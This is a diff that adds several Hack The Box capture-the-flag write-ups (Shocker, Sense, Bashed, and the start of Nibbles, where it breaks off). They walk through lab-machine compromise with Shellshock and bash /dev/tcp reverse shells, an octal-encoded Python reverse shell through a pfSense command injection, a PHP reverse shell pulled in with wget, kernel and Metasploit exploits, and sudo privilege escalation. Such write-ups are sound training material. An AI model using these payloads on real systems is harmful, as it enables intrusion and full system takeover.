+_Terminal 2:_
+
+
+ λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Shocker] → nc -lvnp 1337
+
+
+Now all we have to do is use the previous shocker python script to tell the machine to send us a reverse shell connection on the correct port.
+
+_Terminal 1:_
+
+
+ λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Shocker] → python2 shocker.py -H 10.10.10.56 --command "/bin/bash -i > /dev/tcp/10.10.14.48/1337 0<&1 2>&1" -c /cgi-bin/user.sh --verbose
+
+ .-. . .
+ ( )| |
+ `-. |--. .-. .-.|.-. .-. .--.
+ ( )| |( )( |-.'(.-' |
+ `-' ' `-`-' `-'' `-`--' v1.1
+
+ Tom Watson, tom.watson@nccgroup.trust
+ https://www.github.com/nccgroup/shocker
+
+ Released under the GNU Affero General Public License
+ (https://www.gnu.org/licenses/agpl-3.0.html)
+
+
+ [+] Single target '/cgi-bin/user.sh' being used
+ [+] Checking connectivity with target...
+ [I] Checking to see if 10.10.10.56 resolves...
+ [I] Resolved ok
+ [I] Checking to see if 10.10.10.56 is reachable on port 80...
+ [I] 10.10.10.56 seems reachable...
+ [+] Target was reachable
+ [+] Looking for vulnerabilities on 10.10.10.56:80
+ [I] Starting thread 1
+ [+] Finished host scan
+ [+] 1 potential target found, attempting exploits
+ [+] Trying exploit for http://10.10.10.56:80/cgi-bin/user.sh
+ [I] Flag set to: ZS6W4FQLEFG9B7NYE0K9
+ [I] Header is: Content-type
+ [I] Attack string is: () { :;}; echo; echo ZS6W4FQLEFG9B7NYE0K9; /bin/bash -i > /dev/tcp/10.10.14.48/1337 0<&1 2>&1
+ [I] http://10.10.10.56:80/cgi-bin/user.sh - timed out
+ [-] Not vulnerable
+ [-] All exploit attempts failed
+
+
+The script tells us that it seems to have failed, Although it seems like our second terminal recieved the connection through the 1337 port.
+
+_Terminal 2:_
+
+
+ λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Shocker] → nc -lvnp 1337
+ Connection from 10.10.10.56:38116
+ bash: no job control in this shell
+
+ shelly@Shocker:/usr/lib/cgi-bin$ whoami
+ shelly
+
+ shelly@Shocker:/usr/lib/cgi-bin$ uname -a
+ uname -a
+ Linux Shocker 4.4.0-96-generic #119-Ubuntu SMP Tue Sep 12 14:59:54 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
+
+ shelly@Shocker:/usr/lib/cgi-bin$ cat /home/shelly/user.txt
+ cat /home/shelly/user.txt
+ 2eXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+That's how you get the user flag ! Now let's try to escalate privileges onto the box.
+
+## **Part 3 : Getting Root Access**
+
+First of all let's type the **sudo -l** command to see which commands could potentially be run as the root user.
+
+
+ shelly@Shocker:/usr/lib/cgi-bin$ sudo -l
+ sudo -l
+
+ Matching Defaults entries for shelly on Shocker:
+ env_reset, mail_badpass,
+ secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
+
+ User shelly may run the following commands on Shocker:
+ (root) NOPASSWD: /usr/bin/perl
+
+
+Seems like the perl command can be run as root ! let's test it.
+
+
+ shelly@Shocker:/usr/lib/cgi-bin$ sudo perl -e 'exec "/bin/sh";'
+ sudo perl -e 'exec "/bin/sh";'
+
+ whoami
+ root
+
+
+And that's it ! we now have an elevated privilege shell as the root user. All that's left to do now is to print the root flag.
+
+
+ cat /root/root.txt
+ 52XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
diff --git a/Easy/14.md b/Easy/14.md
new file mode 100644
index 0000000..b535c10
--- /dev/null
+++ b/Easy/14.md
@@ -0,0 +1,157 @@
+# Sense Writeup
+
+
+
+## Introduction :
+
+Sense is an easy FreeBSD box that was released back in October 2017.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [~] → nmap -sC -sV 10.10.10.60
+ Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-21 13:32 CET
+ Nmap scan report for 10.10.10.60
+ Host is up (0.13s latency).
+ Not shown: 998 filtered ports
+ PORT STATE SERVICE VERSION
+ 80/tcp open http lighttpd 1.4.35
+ |_http-server-header: lighttpd/1.4.35
+ |_http-title: Did not follow redirect to https://10.10.10.60/
+ |_https-redirect: ERROR: Script execution failed (use -d to debug)
+ 443/tcp open ssl/http lighttpd 1.4.35
+ |_http-server-header: lighttpd/1.4.35
+ |_http-title: Login
+ | ssl-cert: Subject: commonName=Common Name (eg, YOUR name)/organizationName=CompanyName/stateOrProvinceName=Somewhere/countryName=US
+ | Not valid before: 2017-10-14T19:21:35
+ |_Not valid after: 2023-04-06T19:21:35
+ |_ssl-date: TLS randomness does not represent time
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 44.03 seconds
+
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap scan picked up that the 80th port was opened. let's open see what lies at the corresponding URL within a web browser.
+
+
+
+Seems like we are greeted with a pfSense login page. We are going to run a dirbusting command to enumerate the directories available on the webservice.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [~] → gobuster -w /usr/wordlists/directory.txt -u http://10.10.10.60/ -x php,txt,cnf,conf
+
+
+Gobuster found the cmd.txt, system.txt and changelog.txt
+
+
+
+Navigating to the system-users.txt we seem to have a username to work with. We'll test if we can log in using the default credentials **rohit:pfsense**
+
+
+
+And we are logged in ! We see that the system is running FreeBSD 8.3-RELEASE-p16 with an outdated 2.1.3-RELEASE amd64 pfSense, by running a quick searchsploit command with the keywords pfsense 2.1 we see that the service may be vulnerable to Command Injections.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [~] → searchsploit Sense 2.1
+ --------------------------------------------------------------------------- ----------------------------------------
+ Exploit Title | Path
+ | (/usr/share/exploitdb/)
+ --------------------------------------------------------------------------- ----------------------------------------
+ pfSense 2.1 build 20130911-1816 - Directory Traversal | exploits/php/webapps/31263.txt
+ pfSense < 2.1.4 - 'status_rrd_graph_img.php' Command Injection | exploits/php/webapps/43560.py
+ --------------------------------------------------------------------------- ----------------------------------------
+ Shellcodes: No Result
+
+
+
+Let's first locate the exploit n°43560 on our system and copy it to our current directory.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Sense] → locate 43560.py
+ /usr/share/exploitdb/exploits/php/webapps/43560.py
+
+ λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Sense] → cp /usr/share/exploitdb/exploits/php/webapps/43560.py .
+
+ λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Sense] → nano 43560.py
+
+
+looking at the exploit made by [absolomb](https://www.absolomb.com/), we see that the exploit is supposed to exploit a command Injection Vulnerability that can be found within the status_rrd_graph_img php file onto the pfsense webservice. We will need to pass it the --rhost , --lhost, --lport, --username, --password flags.
+
+## **Part 3 : Getting Root Access**
+
+Within the exploit the main lines are the following :
+
+
+ payload = ""
+
+ # encode payload in octal
+ for char in command:
+ payload += ("\\" + oct(ord(char)).lstrip("0o"))
+
+ exploit_url = "https://" + rhost + "/status_rrd_graph_img.php?database=queues;"+"printf+" + "'" + payload + "'|sh"
+
+
+the exploit starts to browse at the url https://10.10.10.60/status_rrd_graph_img.php?database=queues; and from there starts the Command Execution Vulnerability, and we choose whatever command we need to execute. One thing to note though is that the command should be passed onto the URL with an Octal encoded string. rather than attempting to pass it as plain text, if we isolate the octal conversion part it looks like this :
+
+
+ λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Sense] → cat exploit.py
+ #!/usr/bin/env python3
+
+ command = "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.10.14.48',443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(['/bin/sh','-i'];'"
+
+ payload = ""
+
+ for char in command:
+ payload += ("\\" + oct(ord(char)).lstrip("0o"))
+
+ print(payload)
+
+ λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Sense] → python exploit.py
+ \160\171\164\150\157\156\40\55\143\40\47\151\155\160\157\162\164\40\163\157\143\153\145\164\54\163\165\142\160\162\157\143\145\163\163\54\157\163\73\163\75\163\157\143\153\145\164\56\163\157\143\153\145\164\50\163\157\143\153\145\164\56\101\106\137\111\116\105\124\54\163\157\143\153\145\164\56\123\117\103\113\137\123\124\122\105\101\115\51\73\163\56\143\157\156\156\145\143\164\50\50\47\61\60\56\61\60\56\61\64\56\61\60\47\54\64\64\63\51\51\73\157\163\56\144\165\160\62\50\163\56\146\151\154\145\156\157\50\51\54\60\51\73\40\157\163\56\144\165\160\62\50\163\56\146\151\154\145\156\157\50\51\54\61\51\73\40\157\163\56\144\165\160\62\50\163\56\146\151\154\145\156\157\50\51\54\62\51\73\160\75\163\165\142\160\162\157\143\145\163\163\56\143\141\154\154\50\133\47\57\142\151\156\57\163\150\47\54\47\55\151\47\135\73\47
+
+
+
+Now before we run the python script, we ready our terminal with the nc command with the -lvnp flags in order to catch the incoming reverse shell onto the corresponding port.
+
+_Terminal 1:_
+
+
+ λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Sense] → nc -lvnp 9001
+
+
+_Terminal 2:_
+
+
+ python 43560.py --rhost 10.10.10.60 --lhost 10.10.14.48 --lport 9001 --username rohit --password pfsense
+ CSRF token obtained
+ Running exploit...
+ Exploit completed
+
+
+_Terminal 1:_
+
+
+ λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Sense] → nc -lvnp 9001
+ Connection from 10.10.10.60:34128
+ sh: cant access tty; job control turned off
+ # id
+ uid=0(root) gid=0(wheel) groups=0(wheel)
+ # cat /root/root.txt
+ d0XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+ # cat /home/rohit/user.txt
+ 87XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And that's it ! The exploit spawned a root shell for us, and we have been able to print both the root and the user flags.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
diff --git a/Easy/15.md b/Easy/15.md
new file mode 100644
index 0000000..d88e63a
--- /dev/null
+++ b/Easy/15.md
@@ -0,0 +1,286 @@
+# Bashed Writeup
+
+
+
+## Introduction :
+
+Bashed is an easy Linux box that was released back in December 2017
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [~] → nmap -sC -sV 10.10.10.68
+ Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-21 10:34 CET
+ Nmap scan report for 10.10.10.68
+ Host is up (0.073s latency).
+ Not shown: 999 closed ports
+ PORT STATE SERVICE VERSION
+ 80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
+ |_http-server-header: Apache/2.4.18 (Ubuntu)
+ |_http-title: Arrexels Development Site
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 10.27 seconds
+
+
+## **Part 2 : Getting User Access**
+
+We see that the box has it's 80th port opened. We will run the dirb command to list the directories onto the webserver.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [~] → dirb http://10.10.10.68/
+
+ -----------------
+ DIRB v2.22
+ By The Dark Raver
+ -----------------
+
+ START_TIME: Thu Nov 21 10:44:45 2019
+ URL_BASE: http://10.10.10.68/
+ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
+
+ -----------------
+
+ GENERATED WORDS: 4612
+
+ ---- Scanning URL: http://10.10.10.68/ ----
+ ==> DIRECTORY: http://10.10.10.68/css/
+ ==> DIRECTORY: http://10.10.10.68/dev/
+
+
+Dirbuster found the /dev directory , let's browse to it to see what it contains.
+
+
+
+We navigate to the phpbash.php page and we are greeted by a shell session that has the user privileges.
+
+
+
+And that's how you get the User flag ! Now we will try to spawn a reverse shell to see if we can escalate privileges.
+
+## **Part 3 : Getting Root Access**
+
+We will first off all upload a reverse shell written in php, in order to attempt to send a reverse shell connection to our machine.
+
+
+ λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Bashed] → nano rev.php
+
+ λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Bashed] → cat rev.php
+ & /dev/tcp/10.10.14.48/9001 0>&1'");
+ ?>
+
+ λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Bashed] → python2 -m SimpleHTTPServer 80
+ Serving HTTP on 0.0.0.0 port 80 ...
+
+
+We will be using the wget command on the phpbash shell in order to download our reverse php shell named rev.php
+
+
+ www-data@bashed
+ :/home/arrexel# wget http://10.10.14.48/rev.php
+
+ --2019-11-21 02:34:48-- http://10.10.14.48/rev.php
+ Connecting to 10.10.14.48:80... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 75 [application/octet-stream]
+ rev.php: Permission denied
+
+ Cannot write to 'rev.php' (Success).
+ www-data@bashed:/home/arrexel# ls
+
+ user.txt
+
+
+we need to download the reverse php shell into a directory where we have the writing rights.
+
+
+ www-data@bashed:/home/arrexel# cd /var/www/html
+
+ www-data@bashed:/var/www/html# cd uploads
+
+ www-data@bashed:/var/www/html/uploads# ls
+
+ index.html
+
+ www-data@bashed:/var/www/html/uploads# wget http://10.10.14.48/rev.php
+
+ --2019-11-21 02:35:39-- http://10.10.14.48/rev.php
+ Connecting to 10.10.14.48:80... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 75 [application/octet-stream]
+ Saving to: 'rev.php'
+
+ 0K 100% 8.89M=0s
+
+ 2019-11-21 02:35:39 (8.89 MB/s) - 'rev.php' saved [75/75]
+
+ www-data@bashed:/var/www/html/uploads# ls
+
+ index.html
+ rev.php
+
+
+Let's browse to our reverse shell file and We will be using the nc command with the -lvnp flags in order to catch the incoming reverse shell connection at our 9001 port.
+
+_Terminal 1:_
+
+
+ λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Bashed] → nc -lvnp 9001
+
+
+_Terminal 2:_
+
+
+ λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Bashed] → curl -vsk http://10.10.10.68/uploads/rev.php
+ * Trying 10.10.10.68:80...
+ * TCP_NODELAY set
+ * Connected to 10.10.10.68 (10.10.10.68) port 80 (#0)
+ > GET /uploads/rev.php HTTP/1.1
+ > Host: 10.10.10.68
+ > User-Agent: curl/7.67.0
+ > Accept: */*
+ >
+
+
+
+_Terminal 1:_
+
+
+ λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Bashed] → nc -lvnp 9001
+ Connection from 10.10.10.68:44622
+ bash: cannot set terminal process group (753): Inappropriate ioctl for device
+ bash: no job control in this shell
+ www-data@bashed:/var/www/html/uploads$ id
+ id
+ uid=33(www-data) gid=33(www-data) groups=33(www-data)
+ www-data@bashed:/var/www/html/uploads$
+
+
+We have been able to get our reverse shell ! we are logged in as www-data.
+
+
+ www-data@bashed:/var/www/html/uploads$ sudo -l
+ sudo -l
+ Matching Defaults entries for www-data on bashed:
+ env_reset, mail_badpass,
+ secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
+
+ User www-data may run the following commands on bashed:
+ (scriptmanager : scriptmanager) NOPASSWD: ALL
+
+
+running the sudo command with the -l flag we see that the scriptmanager script can be run as root without any password.
+
+
+ www-data@bashed:/var/www/html/uploads$ uname -a
+ uname -a
+ Linux bashed 4.4.0-62-generic #83-Ubuntu SMP Wed Jan 18 14:10:15 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
+
+
+running the uname command with the -a flag we see that the machine is running an outdated kernel version (4.4) we run a quick searchsploit command to try to find out local exploits for us to use.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Bashed] → searchsploit kernel 4.4
+ --------------------------------------------------------------------------- ----------------------------------------
+ Exploit Title | Path
+ | (/usr/share/exploitdb/)
+ --------------------------------------------------------------------------- ----------------------------------------
+ Linux Kernel 2.4.4 < 2.4.37.4 / 2.6.0 < 2.6.30.4 - 'Sendpage' Local Privil | exploits/linux/local/19933.rb
+ Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/ | exploits/linux_x86/local/9542.c
+ Linux Kernel 3.10/3.18 /4.4 - Netfilter IPT_SO_SET_REPLACE Memory Corrupti | exploits/linux/dos/39545.txt
+ Linux Kernel 4.4 (Ubuntu 16.04) - 'BPF' Local Privilege Escalation (Metasp | exploits/linux/local/40759.rb
+ Linux Kernel 4.4 (Ubuntu 16.04) - 'snd_timer_user_ccallback()' Kernel Poin | exploits/linux/dos/46529.c
+ Linux Kernel 4.4 - 'rtnetlink' Stack Memory Disclosure | exploits/linux/local/46006.c
+ Linux Kernel 4.4.0 (Ubuntu 14.04/16.04 x86-64) - 'AF_PACKET' Race Conditio | exploits/linux_x86-64/local/40871.c
+ Linux Kernel 4.4.0 (Ubuntu) - DCCP Double-Free (PoC) | exploits/linux/dos/41457.c
+ Linux Kernel 4.4.0 (Ubuntu) - DCCP Double-Free Privilege Escalation | exploits/linux/local/41458.c
+ Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) - Netfilter target_offset Out-of- | exploits/linux_x86-64/local/40049.c
+ Linux Kernel 4.4.0-21 < 4.4.0-51 (Ubuntu 14.04/16.04 x86-64) - 'AF_PACKET' | exploits/linux/local/47170.c
+ Linux Kernel 4.4.1 - REFCOUNT Overflow Use-After-Free in Keyrings Local Pr | exploits/linux/local/39277.c
+ Linux Kernel 4.4.1 - REFCOUNT Overflow Use-After-Free in Keyrings Local Pr | exploits/linux/local/40003.c
+ Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' bpf(BPF_PROG_LOAD) Pr | exploits/linux/local/39772.txt
+ Linux Kernel < 3.4.5 (Android 4.2.2/4.4 ARM) - Local Privilege Escalation | exploits/arm/local/31574.c
+
+ **Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation | exploits/linux/local/44298.c**
+
+ Linux Kernel < 4.4.0-21 (Ubuntu 16.04 x64) - 'netfilter target_offset' Loc | exploits/linux/local/44300.c
+ Linux Kernel < 4.4.0-83 / < 4.8.0-58 (Ubuntu 14.04/16.04) - Local Privileg | exploits/linux/local/43418.c
+ Linux Kernel < 4.4.0/ < 4.8.0 (Ubuntu 14.04/16.04 / Linux Mint 17/18 / Zor | exploits/linux/local/47169.c
+ --------------------------------------------------------------------------- ----------------------------------------
+ Shellcodes: No Result
+
+
+Seems like the exploit n°44298 is a good candidate, we first locate it and then copy it to our current directory
+
+
+ λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Bashed] → locate 44298.c
+ /home/nihilist/_HTB/Bashed/44298.c
+ /usr/share/exploitdb/exploits/linux/local/44298.c
+
+ λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Bashed] → cp /usr/share/exploitdb/exploits/linux/local/44298.c .
+
+
+Now that we have the exploit written in C, we are going to use the gcc command compile the script into an executable binary
+
+
+ λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Bashed] → gcc -o 44298 -m64 44298.c
+
+
+
+ λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Bashed] → ls
+ 44298 44298.c progress.graphml rev.php
+
+ λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Bashed] → python2 -m SimpleHTTPServer 80
+ Serving HTTP on 0.0.0.0 port 80 ...
+
+
+Back to our reverse shell connection as www-data, we will use the wget command once again to download our executable named 44298.
+
+
+ www-data@bashed:/var/www/html/uploads$ wget http://10.10.14.48/44298
+ wget http://10.10.14.48/44298
+ --2019-11-21 02:54:01-- http://10.10.14.48/44298
+ Connecting to 10.10.14.48:80... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 17872 (17K) [application/octet-stream]
+ Saving to: '44298'
+
+ 0K .......... ....... 100% 206K=0.08s
+
+ 2019-11-21 02:54:02 (206 KB/s) - '44298' saved [17872/17872]
+
+
+
+let's execute our binary file and see if we can escalate privileges.
+
+
+ www-data@bashed:/var/www/html/uploads$ ./44298
+ ./44298
+ bash: ./44298: Permission denied
+
+
+We need to change permissions on our binary in order to execute it using the chmod command.
+
+
+ www-data@bashed:/var/www/html/uploads$ chmod 775 44298
+ chmod 775 44298
+ www-data@bashed:/var/www/html/uploads$ ./44298
+ ./44298
+ whoami
+ root
+ id
+ uid=0(root) gid=0(root) groups=0(root),33(www-data)
+ cat /root/root.txt
+ ccXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And that's it ! Our binary exploit gave us an escalation of privileges, therefore we have been able to print out the root flag.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
diff --git a/Easy/16.md b/Easy/16.md
new file mode 100644
index 0000000..91d3b4a
--- /dev/null
+++ b/Easy/16.md
@@ -0,0 +1,296 @@
+# Nibbles Writeup
+
+
+
+## Introduction :
+
+Nibbles is an easy Linux Box that was released back in January 2018.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [~] → nmap -sC -sV 10.10.10.75
+ Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-21 09:16 CET
+ Nmap scan report for 10.10.10.75
+ Host is up (0.081s latency).
+ Not shown: 998 closed ports
+ PORT STATE SERVICE VERSION
+ 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
+ | ssh-hostkey:
+ | 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
+ | 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
+ |_ 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
+ 80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
+ |_http-server-header: Apache/2.4.18 (Ubuntu)
+ |_http-title: Site doesnt have a title (text/html).
+ Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 12.83 seconds
+
+
+
+## **Part 2 : Getting User Access**
+
+The previous nmap scan seems to have found a web service running at the 80th port. Let's see what lies at the http://10.10.10.75/ URL using the curl command with the -vsk flags.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [~] → curl -vsk http://10.10.10.75/
+ * Trying 10.10.10.75:80...
+ * TCP_NODELAY set
+ * Connected to 10.10.10.75 (10.10.10.75) port 80 (#0)
+ > GET / HTTP/1.1
+ > Host: 10.10.10.75
+ > User-Agent: curl/7.67.0
+ > Accept: */*
+ >
+ * Mark bundle as not supporting multiuse
+ < HTTP/1.1 200 OK
+ < Date: Thu, 21 Nov 2019 08:23:50 GMT
+ < Server: Apache/2.4.18 (Ubuntu)
+ < Last-Modified: Thu, 28 Dec 2017 20:19:50 GMT
+ < ETag: "5d-5616c3cf7fa77"
+ < Accept-Ranges: bytes
+ < Content-Length: 93
+ < Vary: Accept-Encoding
+ < Content-Type: text/html
+ <
+ **Hello world!**
+
+
+ <****!-- /nibbleblog/ directory. Nothing interesting here! -->
+ * Connection #0 to host 10.10.10.75 left intact
+
+It seems like there is a comment at the bottom of the page that refers to a directory named "nibbleblog" Let's run the dirb command to see what interesting files we could find in this directory.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [~] → dirb http://10.10.10.75/nibbleblog/
+
+ -----------------
+ DIRB v2.22
+ By The Dark Raver
+ -----------------
+
+ START_TIME: Thu Nov 21 09:27:27 2019
+ URL_BASE: http://10.10.10.75/nibbleblog/
+ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
+
+ -----------------
+
+ GENERATED WORDS: 4612
+
+ ---- Scanning URL: http://10.10.10.75/nibbleblog/ ----
+ ==> DIRECTORY: http://10.10.10.75/nibbleblog/admin/
+ + http://10.10.10.75/nibbleblog/admin.php (CODE:200|SIZE:1401)
+
+
+Dirbuster seems to have found the admin.php page ! We browse to the URL to see what we're dealing with.
+
+
+
+This login page has been misconfigured because fuzzing just a little with the possible default credentials we find that **"admin:nibbles"** is actually able to log us in !
+
+
+
+navigating to the Settings page we see that we're dealing with Nibbleblog 4.0.3 "Coffee" Let's run a quick searchsploit command to try to find out which exploits we could use onto the machine.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [~] → searchsploit Nibbleblog 4.0.3
+ -------------------------------------------------------------- ----------------------------------------
+ Exploit Title | Path
+ | (/usr/share/exploitdb/)
+ -------------------------------------------------------------- ----------------------------------------
+ Nibbleblog 4.0.3 - Arbitrary File Upload (Metasploit) | exploits/php/remote/38489.rb
+ -------------------------------------------------------------- ----------------------------------------
+ Shellcodes: No Result
+
+
+There seems to be a metasploit script for us to use, that take advantage of an Arbitrary File Upload vulnerability. Let's fire up msfconsole and choose the according script.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [~] → msfconsole
+ [-] ***rtinG the Metasploit Framework console...\
+ [-] * WARNING: No database support: No database YAML file
+ [-] ***
+
+ , ,
+ / \
+ ((__---,,,---__))
+ (_) O O (_)_________
+ \ _ / |\
+ o_o \ M S F | \
+ \ _____ | *
+ ||| WW|||
+ ||| |||
+
+
+ =[ metasploit v5.0.60-dev ]
+ + -- --=[ 1947 exploits - 1089 auxiliary - 333 post ]
+ + -- --=[ 556 payloads - 45 encoders - 10 nops ]
+ + -- --=[ 7 evasion ]
+
+ msf5 > search nibbleblog 4.0.3
+
+ Matching Modules
+ ================
+
+ # Name Disclosure Date Rank Check Description
+ - ---- --------------- ---- ----- -----------
+ 0 auxiliary/dos/android/android_stock_browser_iframe 2012-12-01 normal No Android Stock Browser Iframe DOS
+ 1 exploit/multi/http/nibbleblog_file_upload 2015-09-01 excellent Yes Nibbleblog File Upload Vulnerability
+
+
+ msf5 > use exploit/multi/http/nibbleblog_file_upload
+ msf5 exploit(multi/http/nibbleblog_file_upload) > show options
+
+ Module options (exploit/multi/http/nibbleblog_file_upload):
+
+ Name Current Setting Required Description
+ ---- --------------- -------- -----------
+ PASSWORD yes The password to authenticate with
+ Proxies no A proxy chain of format type:host:port[,type:host:port][...]
+ RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
+ RPORT 80 yes The target port (TCP)
+ SSL false no Negotiate SSL/TLS for outgoing connections
+ TARGETURI / yes The base path to the web application
+ USERNAME yes The username to authenticate with
+ VHOST no HTTP server virtual host
+
+
+ Exploit target:
+
+ Id Name
+ -- ----
+ 0 Nibbleblog 4.0.3
+
+
+ msf5 exploit(multi/http/nibbleblog_file_upload) > set RHOSTS 10.10.10.75
+ RHOSTS => 10.10.10.75
+ msf5 exploit(multi/http/nibbleblog_file_upload) > set TARGETURI /nibbleblog/
+ TARGETURI => /nibbleblog/
+ msf5 exploit(multi/http/nibbleblog_file_upload) > set USERNAME
+ [-] Unknown variable
+ Usage: set [option] [value]
+
+ Set the given option to value. If value is omitted, print the current value.
+ If both are omitted, print options that are currently set.
+
+ If run from a module context, this will set the value in the module
+ datastore. Use -g to operate on the global datastore
+
+ msf5 exploit(multi/http/nibbleblog_file_upload) > set USERNAME admin
+ USERNAME => admin
+ msf5 exploit(multi/http/nibbleblog_file_upload) > set PASSWORD nibbles
+ PASSWORD => nibbles
+ msf5 exploit(multi/http/nibbleblog_file_upload) > exploit
+
+
+
+We hit exploit and see what results we can get.
+
+
+ msf5 exploit(multi/http/nibbleblog_file_upload) > exploit
+
+ [*] Started reverse TCP handler on 10.10.14.48:4444
+ [*] Sending stage (38288 bytes) to 10.10.10.75
+ [*] Meterpreter session 1 opened (10.10.14.48:4444 -> 10.10.10.75:47254) at 2019-11-21 09:46:53 +0100
+ [+] Deleted image.php
+ ls
+
+ meterpreter > ls
+ Listing: /var/www/html/nibbleblog/content/private/plugins/my_image
+ ==================================================================
+
+ Mode Size Type Last modified Name
+ ---- ---- ---- ------------- ----
+ 100644/rw-r--r-- 258 fil 2019-11-21 09:47:03 +0100 db.xml
+
+ meterpreter > sysinfo
+ Computer : Nibbles
+ OS : Linux Nibbles 4.4.0-104-generic #127-Ubuntu SMP Mon Dec 11 12:16:42 UTC 2017 x86_64
+ Meterpreter : php/linux
+
+ meterpreter > shell
+ Process 1707 created.
+ Channel 0 created.
+
+ cat /home/nibbler/user.txt
+ b0XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+It spawned us a meterpreter session ! We then created a shell , which was logged as the user Nibbler. We have then been able to print out the user flag.
+
+## **Part 3 : Getting Root Access**
+
+Let's first get a fully interactive shell using the python pty.spawn one liner.
+
+
+ python3 -c 'import pty;pty.spawn("/bin/bash")'
+ nibbler@Nibbles:/var/www/html/nibbleblog/content/private/plugins/my_image$ cd /
+
+ nibbler@Nibbles:/$ ls
+ ls
+ bin home lib64 opt sbin tmp vmlinuz.old
+ boot initrd.img lost+found proc snap usr
+ dev initrd.img.old media root srv var
+ etc lib mnt run sys vmlinuz
+
+
+Let's navigate to /home/nibbler/ and see what we can work with.
+
+
+ nibbler@Nibbles:/$ cd home/nibbler
+ cd home/nibbler
+ nibbler@Nibbles:/home/nibbler$ ls
+ ls
+ personal.zip user.txt
+
+
+There seems to be a zip file here, let's unzip it and see what's inside.
+
+
+ nibbler@Nibbles:/home/nibbler$ unzip personal.zip
+ unzip personal.zip
+ Archive: personal.zip
+ creating: personal/
+ creating: personal/stuff/
+ inflating: personal/stuff/monitor.sh
+
+ nibbler@Nibbles:/home/nibbler$ cd personal/stuff
